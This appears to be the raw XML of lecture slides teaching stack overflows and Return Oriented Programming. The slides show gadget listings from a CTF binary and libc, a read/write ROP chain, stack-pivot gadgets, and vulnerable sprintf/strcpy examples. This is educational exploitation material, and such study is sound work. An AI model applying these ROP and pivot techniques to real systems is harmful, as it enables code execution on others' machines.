          <a:xfrm>
            <a:off x="6448000" y="1150950"/>
            <a:ext cx="1571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0x41414141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7" name="Shape 1687"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2137300" y="1425100"/>
            <a:ext cx="2287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0x41414141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Shape 16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ROP(Return Oriented Programming)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3" name="Shape 1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75" y="1899201"/>
            <a:ext cx="2673550" cy="15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Shape 16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200" y="1379372"/>
            <a:ext cx="2384750" cy="23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Shape 1695"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3857625" y="2405825"/>
            <a:ext cx="1016100" cy="4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Shape 1696"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1398850" y="3764125"/>
            <a:ext cx="16218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Gadgets</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1697" name="Shape 1697"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5845675" y="3764125"/>
            <a:ext cx="16218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Payload</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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Shape 17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Gadgets</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1703" name="Shape 1703"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="3814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rp -f ropasaurusrex -r 3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 total of 102 gadgets found.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0x080484d0: adc edi, dword [ebx+0x0804951C] ; nop  ; sub ebx, 0x04 ; call eax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0x080483ed: add al, 0x08 ; call eax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0x080484d4: add al, 0x08 ; nop  ; sub ebx, 0x04 ; call eax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0x080483e9: add al, 0x24 ; sub al, 0x95 ; add al, 0x08 ; call eax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0x080483c1: add al, 0x5B ; pop ebp ; ret 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0x080482e7: add byte [eax+0x5B], bl ; leave  ; ret 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0x080482c5: add byte [eax], al ; add byte [ebx-0x7F], bl ; ret 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0x080484f7: add byte [ebx-0x7F], bl ; ret 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0x080482e5: add dword [eax], eax ; add byte [eax+0x5B], bl ; leave  ; ret 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0x080483be: add dword [ebx+0x5D5B04C4], eax ; ret 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0x080483b9: add eax, 0x08049628 ; add dword [ebx+0x5D5B04C4], eax ; ret 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0x080483bf: add esp, 0x04 ; pop ebx ; pop ebp ; ret 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0x0804841a: dec ecx ; ret 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0x08048506: leave  ; ret  ;  (1 found)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rp -f /lib/i386-linux-gnu/libc.so.6  -r 3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Trying to open '/lib/i386-linux-gnu/libc.so.6'..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 total of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109981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gadgets found.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4" name="Shape 1704"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3629500" y="1152475"/>
            <a:ext cx="4044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Tool: https://github.com/0vercl0k/rp</a:t>
            </a:r>
            <a:endParaRPr b="1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Shape 17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multiple libc functions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1710" name="Shape 1710"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287700" y="3370175"/>
            <a:ext cx="4811700" cy="45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read(int fd, char *buf, int len);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1" name="Shape 1711"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5703675" y="1676075"/>
            <a:ext cx="15714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*buf</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1712" name="Shape 1712"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5703675" y="1983275"/>
            <a:ext cx="15714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fd=1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1713" name="Shape 1713"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5703675" y="1368875"/>
            <a:ext cx="15714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len</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1714" name="Shape 1714"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5703675" y="2290475"/>
            <a:ext cx="15714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pop3ret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15" name="Shape 1715"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5703675" y="2597675"/>
            <a:ext cx="15714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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1716" name="Shape 1716"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5703675" y="2904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len</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1717" name="Shape 1717"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5703675" y="32120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*buf</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1718" name="Shape 1718"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5703675" y="3519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fd=0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1719" name="Shape 1719"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5703675" y="3826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pop3ret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20" name="Shape 1720"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5703675" y="41336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1721" name="Shape 1721"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287700" y="1908725"/>
            <a:ext cx="4811700" cy="45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write(char *path, char *argv[], char *envp[]);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22" name="Shape 1722"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1710" idx="0"/>
            <a:endCxn id="1721" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2693550" y="2365175"/>
            <a:ext cx="0" cy="100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3" name="Shape 1723"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5261588" y="1607325"/>
            <a:ext cx="279900" cy="1151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Shape 1724"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5261575" y="3097325"/>
            <a:ext cx="279900" cy="1151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Shape 1725"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7788300" y="2644325"/>
            <a:ext cx="1068000" cy="104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 esi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 edi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 ebp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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1726" name="Shape 1726"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1714" idx="3"/>
            <a:endCxn id="1725" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7275075" y="2444075"/>
            <a:ext cx="513300" cy="72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7" name="Shape 1727"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1719" idx="3"/>
            <a:endCxn id="1725" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="7275075" y="3167975"/>
            <a:ext cx="513300" cy="81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Shape 17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pivot</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1733" name="Shape 1733"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475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a gadget to move the stack by changing %esp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Overflow is not long enough to do ROP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Stack payload is null-terminated, and the gadget address starts with null byte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need new ROP payload after memory leak</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1734" name="Shape 1734"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4813650" y="3443925"/>
            <a:ext cx="3928200" cy="15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286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stack_overflow(char *user)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dst[512];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sprintf(dst, "%s", user);</a:t>
            </a:r>
            <a:endParaRPr b="1"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x64 assembly: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0x406113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	55         push   %rbp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0x406114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	41 89 d4   mov    %edx,%r12d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5" name="Shape 1735"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="610675" y="3495775"/>
            <a:ext cx="3485400" cy="142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286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stack_overflow(char *user)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dst[512];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if (strlen(user) &gt; 536)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return;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536-512=24 bytes overflow!</a:t>
            </a:r>
            <a:endParaRPr b="1"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strcpy(dst, user);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Shape 17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pivot: add esp</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1741" name="Shape 1741"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361475" y="2530250"/>
            <a:ext cx="1571400" cy="7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42" name="Shape 1742"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361475" y="3279500"/>
            <a:ext cx="15714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gadget</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1743" name="Shape 1743"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361475" y="222305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1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1744" name="Shape 1744"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1783625" y="3230900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 esp, 0x6C ; ret ;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1745" name="Shape 1745"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361475" y="191585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46" name="Shape 1746"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1783625" y="1867250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ROP payload</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1747" name="Shape 1747"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361475" y="160865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N</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1748" name="Shape 1748"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1742" idx="1"/>
            <a:endCxn id="1744" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4033975" y="3433100"/>
            <a:ext cx="132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9" name="Shape 1749"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4905000" y="1694900"/>
            <a:ext cx="404400" cy="749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0" name="Shape 1750"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1749" idx="1"/>
            <a:endCxn id="1746" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4033800" y="2069450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1" name="Shape 1751"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4285330" y="3425975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752" name="Shape 1752"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4958280" y="3579575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3" name="Shape 1753"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1783625" y="3944775"/>
            <a:ext cx="2250300" cy="404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stack overflow; ret;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54" name="Shape 1754"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1753" idx="0"/>
            <a:endCxn id="1744" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2908775" y="3635175"/>
            <a:ext cx="0" cy="30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5" name="Shape 1755"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1744" idx="0"/>
            <a:endCxn id="1746" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2908775" y="2271500"/>
            <a:ext cx="0" cy="9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kind of data structure: first in, last out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function's local memory management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variables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Calling information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Stack grows by decreasing memory address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 register always points to the top of stack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operations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Push: esp = esp - 4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Pop: esp = esp + 4</a:t>
            </a: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5803400" y="1726425"/>
            <a:ext cx="2844925" cy="2054800"/>
            <a:chOff x="6531700" y="1432825"/>
            <a:chExt cx="2844925" cy="2054800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="159" name="Shape 159"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6531850" y="1574575"/>
              <a:ext cx="1115100" cy="295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531850" y="1869775"/>
              <a:ext cx="1115100" cy="295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531850" y="2164975"/>
              <a:ext cx="1115100" cy="295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6531850" y="2460175"/>
              <a:ext cx="1115100" cy="295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531850" y="2755375"/>
              <a:ext cx="1115100" cy="295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6531700" y="3050575"/>
              <a:ext cx="1115100" cy="295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0xdeadbeef</a:t>
              </a:r>
              <a:endParaRPr sz="1200"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="165" name="Shape 165"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="7646950" y="3334175"/>
              <a:ext cx="512100" cy="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6" name="Shape 166"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8159125" y="3192425"/>
              <a:ext cx="603000" cy="29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</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="167" name="Shape 167"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="7646950" y="1574575"/>
              <a:ext cx="512100" cy="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8" name="Shape 168"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8102225" y="1432825"/>
              <a:ext cx="1274400" cy="436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Bottom,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high address</a:t>
              </a:r>
              <a:endParaRPr/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6911411" y="3183225"/>
            <a:ext cx="2157830" cy="295200"/>
            <a:chOff x="7646710" y="3192425"/>
            <a:chExt cx="2583300" cy="295200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="170" name="Shape 170"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="171" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="7646710" y="3340025"/>
              <a:ext cx="607800" cy="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71" name="Shape 171"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8254510" y="3192425"/>
              <a:ext cx="1975500" cy="29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Top, low address</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="Shape 172"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3905025" y="3341725"/>
            <a:ext cx="1579800" cy="29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0xdeadbeef</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="173" name="Shape 173"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="172" idx="3"/>
            <a:endCxn id="164" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5484825" y="3489325"/>
            <a:ext cx="318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Shape 174"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7146300" y="3383425"/>
            <a:ext cx="113700" cy="211800"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
              <a:gd fmla="val 79463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Shape 17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pivot: add esp</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1761" name="Shape 1761"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361475" y="2530250"/>
            <a:ext cx="1571400" cy="7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0x6c bytes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1762" name="Shape 1762"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361475" y="3279500"/>
            <a:ext cx="15714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gadget</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1763" name="Shape 1763"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361475" y="222305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1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1764" name="Shape 1764"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1783625" y="3230900"/>
            <a:ext cx="2250300" cy="404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add esp, 0x6C ; ret ;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65" name="Shape 1765"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361475" y="191585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66" name="Shape 1766"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1783625" y="1867250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ROP payload</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1767" name="Shape 1767"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361475" y="160865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N</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1768" name="Shape 1768"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1762" idx="1"/>
            <a:endCxn id="1764" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4033975" y="3433100"/>
            <a:ext cx="132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9" name="Shape 1769"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4905000" y="1694900"/>
            <a:ext cx="404400" cy="749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0" name="Shape 1770"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1769" idx="1"/>
            <a:endCxn id="1766" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4033800" y="2069450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1" name="Shape 1771"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4285330" y="3121175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772" name="Shape 1772"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4958280" y="3274775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3" name="Shape 1773"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1783625" y="3944775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 overflow; ret;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74" name="Shape 1774"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1773" idx="0"/>
            <a:endCxn id="1764" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2908775" y="3635175"/>
            <a:ext cx="0" cy="30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5" name="Shape 1775"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1764" idx="0"/>
            <a:endCxn id="1766" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2908775" y="2271500"/>
            <a:ext cx="0" cy="9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Shape 17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pivot: add esp</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1781" name="Shape 1781"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361475" y="2530250"/>
            <a:ext cx="1571400" cy="7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82" name="Shape 1782"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361475" y="3279500"/>
            <a:ext cx="15714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gadget</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1783" name="Shape 1783"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361475" y="222305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1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1784" name="Shape 1784"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1783625" y="3230900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 esp, 0x6C ; ret ;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1785" name="Shape 1785"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361475" y="191585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86" name="Shape 1786"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1783625" y="1867250"/>
            <a:ext cx="2250300" cy="404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ROP payload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87" name="Shape 1787"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361475" y="160865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N</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1788" name="Shape 1788"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1782" idx="1"/>
            <a:endCxn id="1784" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4033975" y="3433100"/>
            <a:ext cx="132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9" name="Shape 1789"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4905000" y="1694900"/>
            <a:ext cx="404400" cy="749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0" name="Shape 1790"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1789" idx="1"/>
            <a:endCxn id="1786" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4033800" y="2069450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1" name="Shape 1791"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4285330" y="2064745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792" name="Shape 1792"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4958280" y="2218345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3" name="Shape 1793"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1783625" y="3944775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 overflow; ret;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94" name="Shape 1794"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1793" idx="0"/>
            <a:endCxn id="1784" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2908775" y="3635175"/>
            <a:ext cx="0" cy="30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5" name="Shape 1795"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1784" idx="0"/>
            <a:endCxn id="1786" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2908775" y="2271500"/>
            <a:ext cx="0" cy="9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Shape 18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pivot: "pop ebp ret" + "leave ret"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1801" name="Shape 1801"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123525" y="3428375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ebp ret</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1802" name="Shape 1802"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123475" y="1866550"/>
            <a:ext cx="1571400" cy="21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ebp value</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1803" name="Shape 1803"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2545625" y="3563750"/>
            <a:ext cx="22503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 ebp ; ret ;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1804" name="Shape 1804"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
